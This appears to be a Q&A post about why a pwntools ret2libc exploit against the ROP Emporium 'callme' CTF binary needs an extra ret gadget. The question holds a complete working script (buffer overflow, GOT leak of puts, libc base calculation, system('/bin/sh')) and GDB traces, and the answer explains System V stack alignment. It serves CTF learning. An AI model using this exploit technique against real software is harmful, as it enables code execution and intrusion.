Stack alignment in x64 is not 16-bytes?

I tried this code:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *

elf = context.binary = ELF(args.EXE or 'callme')
libc = elf.libc
rop = ROP([elf, libc])
pop_rdi = p64(0x00000000004009a3)
ret = p64(0x00000000004006be)

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([elf.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([elf.path] + argv, *a, **kw)

gdbscript = '''
break *pwnme+89
continue
'''.format(**locals())

offset = b'A' * 40

'''
1. print a leak to the address in libc in puts()'s GOT
2. grab that leak, calculate system and '/bin/sh'
3. call it. GG
'''

rop.raw(offset)
rop.call('puts', [elf.got['puts']])
rop.call('main')



io = start()
io.sendafter(b'> ', rop.chain())

# grab our leak
io.recvuntil(b'!\n')
leak = u64(io.recvline().strip().ljust(8, b'\x00'))
print(f"[*] Got a leak: {hex(leak)}")

libc_base = leak - libc.sym['puts']
print(f'[**] libc_base = {hex(libc_base)}')
system = libc_base + libc.sym['system']
bin_sh = libc_base + next(libc.search(b'/bin/sh\x00'))
print(f'[**] system addr = {hex(system)};   bin_sh = {hex(bin_sh)}')

payload = [
    offset,
    ret,  # align the stack pointer 
    pop_rdi,
    p64(bin_sh),
    p64(system)
]

io.sendafter(b'> ', b''.join(payload))

io.interactive()

When I run the code and attach to GDB, with the payload being with the alignment (the additional ret instruction):

payload = [
    offset,
    ret,   # align the stack pointer 
    pop_rdi,
    p64(bin_sh),
    p64(system)
]

I saw that RSP is not 16-byte aligned when entering system (RSP = 0x7fff699d1c18)

*RSP  0x7fff699d1c18 —▸ 0x7fff699d1d08 —▸ 0x7fff699d3276 ◂— '/mnt/c/Users/tal/Workspace/CTFs/ROPEmporium/callme/callme'
*RIP  0x7f768b627d70 (system) ◂— endbr64
─────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────
   0x4008f1       <pwnme+89>               ret
    ↓
   0x4006be       <_init+22>               ret
    ↓
   0x4009a3       <__libc_csu_init+99>     pop    rdi
   0x4009a4       <__libc_csu_init+100>    ret
    ↓
 ► 0x7f768b627d70 <system>                 endbr64
   0x7f768b627d74 <system+4>               test   rdi, rdi
   0x7f768b627d77 <system+7>               je     7f768b627d80h                 <system+16>

   0x7f768b627d79 <system+9>               jmp    7f768b627900h                 <do_system>
    ↓
   0x7f768b627900 <do_system>              push   r15
   0x7f768b627902 <do_system+2>            mov    edx, 1
   0x7f768b627907 <do_system+7>            push   r14

And this code, to my surprise works as intended.

On the other hand, if I run the code and attach to GDB, with the payload being without the alignment (no additional ret):

payload = [
    offset,
    pop_rdi,
    p64(bin_sh),
    p64(system)
]

I saw that RSP is 16-byte aligned when entering system (RSP = 0x7ffddaf2e9a0)

*RSP  0x7ffddaf2e9a0 ◂— 0x100000000
*RIP  0x7f9dc7c27d70 (system) ◂— endbr64
─────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────
   0x4008f1       <pwnme+89>               ret
    ↓
   0x4009a3       <__libc_csu_init+99>     pop    rdi
   0x4009a4       <__libc_csu_init+100>    ret
    ↓
 ► 0x7f9dc7c27d70 <system>                 endbr64
   0x7f9dc7c27d74 <system+4>               test   rdi, rdi
   0x7f9dc7c27d77 <system+7>               je     7f9dc7c27d80h                 <system+16>

   0x7f9dc7c27d79 <system+9>               jmp    7f9dc7c27900h                 <do_system>
    ↓
   0x7f9dc7c27900 <do_system>              push   r15
   0x7f9dc7c27902 <do_system+2>            mov    edx, 1
   0x7f9dc7c27907 <do_system+7>            push   r14
   0x7f9dc7c27909 <do_system+9>            lea    r14, [rip + 1cbf30h]

And this code doesn't work, it crashes in do_system later (see below).

Program received signal SIGSEGV, Segmentation fault.
0x00007f9dc7c27973 in __sigemptyset (set=<optimized out>) at ../sysdeps/unix/sysv/linux/sigsetops.h:54
54      in ../sysdeps/unix/sysv/linux/sigsetops.h

RSP  0x7ffddaf2e5e8 ◂— 0x0
RIP  0x7f9dc7c27973 (do_system+115) ◂— movaps xmmword ptr [rsp], xmm1
─────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────
   0x7f9dc7c27946 <do_system+70>     xor    eax, eax
   0x7f9dc7c27948 <do_system+72>     mov    dword ptr [rsp + 18h], 0ffffffffh
   0x7f9dc7c27950 <do_system+80>     mov    qword ptr [rsp + 180h], 1
   0x7f9dc7c2795c <do_system+92>     mov    dword ptr [rsp + 208h], 0
   0x7f9dc7c27967 <do_system+103>    mov    qword ptr [rsp + 188h], 0
 ► 0x7f9dc7c27973 <do_system+115>    movaps xmmword ptr [rsp], xmm1
   0x7f9dc7c27977 <do_system+119>    lock cmpxchg dword ptr [rip + 1cbe01h], edx
   0x7f9dc7c2797f <do_system+127>    jne    7f9dc7c27c30h                 <do_system+816>

   0x7f9dc7c27985 <do_system+133>    mov    eax, dword ptr [rip + 1cbdf9h]
   0x7f9dc7c2798b <do_system+139>    lea    edx, [rax + 1]
   0x7f9dc7c2798e <do_system+142>    mov    dword ptr [rip + 1cbdf0h], edx

I do see that RSP equals 0x7ffddaf2e5e8 when it segfaults.

Does this mean that RSP isn't necessarily aligned to 16-bytes when calling a function?

Solution

It's not just "isn't necessary aligned" - it's actually mandatory for the stack to not be aligned at the start and the end of the function - and it must be misaligned by exactly 8 bytes.

The 16 bytes is not a natural alignment for x64 - most stack operations work in 8-byte increments, so they naturally maintain an 8 byte alignment. However, many SSE instructions require a 16 byte alignment - so it was decided to include 16 byte alignment in the calling convention.

Because 16 bytes is not a natural alignment, doing pushes and pops will not maintain that alignment. Instead, it will alternate between two states: full alignment (RSP=16n) and half alignment (RSP=16n+8).

System V calling convention says: the stack must be 16-aligned before the call. But the call pushes 8 bytes - so it will always be half-aligned after the call:

The end of the input argument area shall be aligned on a 16 (32, if __m256 is passed on stack) byte boundary. In other words, the value (%rsp + 8) is always a multiple of 16 (32) when control is transferred to the function entry point.

Similarly, the ret pops the stack - so the stack must be half-aligned before return to become fully aligned after return.